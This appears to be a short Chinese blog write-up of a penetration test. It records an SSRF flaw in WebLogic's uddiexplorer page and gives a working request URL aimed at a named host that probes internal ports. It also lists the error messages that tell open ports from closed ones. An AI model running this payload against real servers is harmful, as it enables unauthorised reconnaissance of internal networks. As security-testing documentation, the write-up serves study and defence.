0x00 前言
测试遇到了BEA Weblogic Server ssrf漏洞,记录一下。
0x01 ssrf内网端口探测
探测内网主机 10.10.0.217 2222端口
1 | http://zhengbao.wang/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.10.0.217:2222&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search |
端口开放回显did not have a valid SOAP content-type
,如下图
探测1234端口,端口关闭回显could not connect over HTTP to server
,如下图
根据回显不同,可做内网端口探测。
其他关于ssrf的利用,可参见博客文章 SSRF的一些利用姿势